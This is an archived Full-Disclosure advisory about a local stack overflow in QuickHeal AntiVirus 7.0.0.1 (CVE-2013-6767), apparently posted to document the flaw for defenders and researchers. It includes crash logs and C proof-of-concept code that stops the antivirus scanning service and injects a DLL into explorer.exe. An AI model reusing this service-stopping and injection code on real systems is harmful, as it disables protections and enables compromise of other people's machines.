lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <52AF897C.1050702@vulnerability-lab.com>
Date: Tue, 17 Dec 2013 00:15:08 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: full-disclosure@...ts.grok.org.uk
Subject: QuickHeal AntiVirus 7.0.0.1 - Stack Overflow
	Vulnerability

Document Title:
===============
QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1171

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767

CVE-ID:
=====
CVE-2013-6767


Release Date:
=============
2013-12-16


Vulnerability Laboratory ID (VL-ID):
====================================
1171


Common Vulnerability Scoring System:
====================================
5.6


Product & Service Introduction:
===============================
The simple interface and best virus protection technology of Quick Heal AntiVirus Pro ensures complete security without interrupting 
or slowing down your system. Real time cloud security restricts access to malware infected websites. Spam filters stop phishing and 
infected emails from reaching your inbox. Uninterrupted PC usage and viewing without prompts. 

Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the intermediate home user. On first appearances, Quick Heal 
Anti-Virus doesn’t do well. Installation is complicated, and the initial window that shows up is not, in fact, the main interface. Once 
you find your way back to the control center, however, things become much clearer.

Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not revolutionary, interface and all the sections are easy 
to navigate. It also has a good selection of configuration options, where you can customize everything from what behavior the program 
takes when it finds a virus to setting a password so nobody can change your configurations.

(Copy of the Homepage: http://www.quickheal.com/download-free-antivirus )


Abstract Advisory Information:
==============================
An independent laboratory researcher discovered a local stack buffer overflow vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.


Vulnerability Disclosure Timeline:
==================================
2013-12-16:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Quick Heal Technologies (P) Ltd
Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0)


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.
The vulnerability allows local low privileged user accounts to compromise the system by a classic stack overflow issue. 

QuickHeal Antivirus suffers from improper handling of buffers in it`s `pepoly.dll` module on certain conditions which leads 
to a stack overflow. Upon disabling `Core scanning server` service, the vulnerable point could be triggered & crash the system. 
Just run the PoC & once you see properties dialog, change your tab from `General` to `QuickHeal`. This will cause the QuickHeal 
to scan your file & reports back to you the file status (whether it`s infected or clean). It`s notable that, in normal conditions 
I was unable to trigger the vulnerability, & this is what`s the reason why I inject a dll into `explorer.exe` to trigger the bug 
in right manner.

The vulnerability is located in the generated PE file `*.text` value. Local attackers are able to overflow the process by a 
manipulated import of a malicious PE file. The issue is a classic (uni-code) stack buffer overflow. Local attackers can overwrite 
the registers to compromise the system or crash the quickheal software system process. The security risk of the local stack buffer 
overflow vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7.

The vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. 
Successful exploitation of the local stack buffer overflow software vulnerability results in process- and system compromise. 


Proof of Concept (PoC):
=======================
The local stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and 
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.


--- PoC Debug Logs --- 
eax=000015bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi=00000000
eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** WARNING: Unable to verify checksum for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll - 
pepoly!GetRealTypeByContents+0x297147:
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
05bab107 8501            test    dword ptr [ecx],eax  ds:0023:03f12a34=00000000
0:019> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
03f47a2c 05b73afa 059342ac 00000000 000822d8 pepoly!GetRealTypeByContents+0x297147
03f47ab0 41414141 41414141 41414141 41414141 pepoly!GetRealTypeByContents+0x25fb3a
03f47ab4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ab8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47abc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47acc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad0 41414141 41414141 41414141 30280000 <Unloaded_Res.dll>+0x41414110
03f47ad4 41414141 41414141 30280000 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad8 41414141 30280000 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47adc 30280000 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x3027ffcf
03f47ae4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47aec 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
--- PoC Debug Logs --- 


--------------------- *.c

Title			:  QuickHeal Antivirus Pro (Pepoly.dll) Stack Overflow Vulnerability 	
Version			:  7.0.0.1 (2014) - ( latest & other versions might also be affected )
Author			:  Arash Allebrahim	
Contact			:  Genius_s3c_firewall($$$)yahoo($$$)com		
Vendor			:  http://www.quickheal.com	
Tested			:  Win 7 sp 1 x86 Ultimate & Win XP SP3 ENG	
Note			: vuln.exe should be at c:\vuln.exe => vuln.exe is just a Corrupted PE File aims at crashing & nothing more

*/

#include <windows.h> 
#include <tlhelp32.h> 
#include <shlwapi.h> 
#include <conio.h> 
#include <stdio.h> 
#include <tchar.h>
#include <aclapi.h>

#define WIN32_LEAN_AND_MEAN 
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) 

#pragma comment(lib, "advapi32.lib")

typedef struct _SERVICE_STATUS_PROCESS {
  DWORD dwServiceType;
  DWORD dwCurrentState;
  DWORD dwControlsAccepted;
  DWORD dwWin32ExitCode;
  DWORD dwServiceSpecificExitCode;
  DWORD dwCheckPoint;
  DWORD dwWaitHint;
  DWORD dwProcessId;
  DWORD dwServiceFlags;
} SERVICE_STATUS_PROCESS, *LPSERVICE_STATUS_PROCESS;

VOID __stdcall DoStopSvc(); 

SC_HANDLE schSCManager;
SC_HANDLE schService;

int main(int argc, char * argv[]) 
{ 
   char buf[MAX_PATH] = {0}; 
   DWORD pID = GetTargetThreadIDFromProcName("explorer.exe"); 
   printf("\n\n");
   printf("\n\nQuickHeal Antivirus (7.0.0.1) pepoly.dll stack overflow vulnerability Proof of Concept Code");
   printf("\n\nAuthor : Arash Allebrahim");
   

   GetFullPathName("ShellExecuteExProperties.dll", MAX_PATH, buf, NULL); 
 
   printf("\n"); 

   DoStopSvc();   
   if(!Inject(pID, buf)) 
   { 
        printf("\n\nDLL Not Loaded!"); 
    }else{ 
        printf("\n\nDLL Loaded!"); 
		printf("\n\n( + ) It's ok! just click on QuickHeal tab!");
    }	 
	
    _getch(); 
   return 0; 
} 

VOID __stdcall DoStopSvc()
{
    SERVICE_STATUS_PROCESS ssp;
    DWORD dwStartTime = GetTickCount();
    DWORD dwBytesNeeded;
    DWORD dwTimeout = 30000; 
    DWORD dwWaitTime;
    schSCManager = OpenSCManager( 
        NULL,                   
        NULL,                    
        SC_MANAGER_ALL_ACCESS);  
 
    if (NULL == schSCManager) 
    {
        printf("OpenSCManager failed (%d)\n", GetLastError());
        return;
    }

    schService = OpenService( 
        schSCManager,          
        "Core Scanning Server",            
        SERVICE_STOP | 
        SERVICE_QUERY_STATUS | 
        SERVICE_ENUMERATE_DEPENDENTS);  
 
    if (schService == NULL)
    { 
        printf("OpenService failed (%d)\n", GetLastError()); 
        CloseServiceHandle(schSCManager);
        return;
    }    

    if ( !ControlService( 
            schService, 
            SERVICE_CONTROL_STOP, 
            (LPSERVICE_STATUS) &ssp ) )
    {
        printf( "ControlService failed (%d)\n", GetLastError() );       
    }

    CloseServiceHandle(schService); 
    CloseServiceHandle(schSCManager);
}

BOOL Inject(DWORD pID, const char * DLL_NAME) 
{ 
   HANDLE Proc; 
   HMODULE hLib; 
   char buf[50] = {0}; 
   LPVOID RemoteString, LoadLibAddy; 
   if(!pID) 
      return FALSE; 
   Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID); 
   if(!Proc) 
   { 
      sprintf(buf, "OpenProcess() failed: %d", GetLastError()); 
      printf(buf); 
      return FALSE; 
   }    
   LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");    
   RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);    
   WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME, strlen(DLL_NAME), NULL);   
   CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); 
   CloseHandle(Proc); 
   return TRUE; 
} 

DWORD GetTargetThreadIDFromProcName(const char * ProcName) 
{ 
   PROCESSENTRY32 pe; 
   HANDLE thSnapShot; 
   BOOL retval, ProcFound = FALSE; 
   thSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
   if(thSnapShot == INVALID_HANDLE_VALUE) 
   {       
      printf("Error: Unable to create toolhelp snapshot!"); 
      return FALSE; 
   } 
   pe.dwSize = sizeof(PROCESSENTRY32); 
    
   retval = Process32First(thSnapShot, &pe); 
   while(retval) 
   { 
      if(StrStrI(pe.szExeFile, ProcName)) 
      { 
         return pe.th32ProcessID; 
      } 
      retval = Process32Next(thSnapShot, &pe); 
   } 
   return 0; 
}



PoC:  PE File

To manipulate a PE test file you need to generate own.
In the second step you replace after the PE[NULL] flag the context of the *.text (*) value with an own large uni-code string.


Standard files: StdAfx.h, StdAfx.cpp
These files are used to build a precompiled header (PCH) file
named ShellExecuteExProperties.pch and a precompiled types file named StdAfx.obj.

Other notes:
AppWizard uses "TODO:" to indicate parts of the source code you
should add to or customize.


Resource(s):
				../ShellExecuteExProperties/ShellExecuteExProperties.cpp
				../ShellExecuteExProperties/ShellExecuteExProperties.dsw
				../ShellExecuteExProperties/ShellExecuteExProperties.opt
				../ShellExecuteExProperties/ShellExecuteExProperties.ncb
				../ShellExecuteExProperties/ShellExecuteExProperties.plg
				../ShellExecuteExProperties/ShellExecuteExProperties.dsp
				../ShellExecuteExProperties/StdAfx.cpp
				../ShellExecuteExProperties/StdAfx.h
				../ShellExecuteExProperties/Debug/ShellExecuteExProperties.dll
				../ShellExecuteExProperties/Debug/ShellExecuteExProperties.ilk
				../ShellExecuteExProperties/Debug/ShellExecuteExProperties.obj
				../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pch
				../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pdb
				../ShellExecuteExProperties/Debug/StdAfx.obj
				../ShellExecuteExProperties/Debug/vc60.idb
				../ShellExecuteExProperties/Debug/vc60.pdb


				../QH-PoC.c
				../QH-PoC.dsp
				../QH-PoC.dsw
				../QH-PoC.ncb
				../QH-PoC.opt
				../QH-PoC.plg


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter and size restriction of the PE file name text flag.


Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability is estimated as medium(+).


Credits & Authors:
==================
Independent Laboratory Researcher - Arash Allebrahim - (Genius_s3c_firewall($$$)yahoo($$$)com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       - admin@...lution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ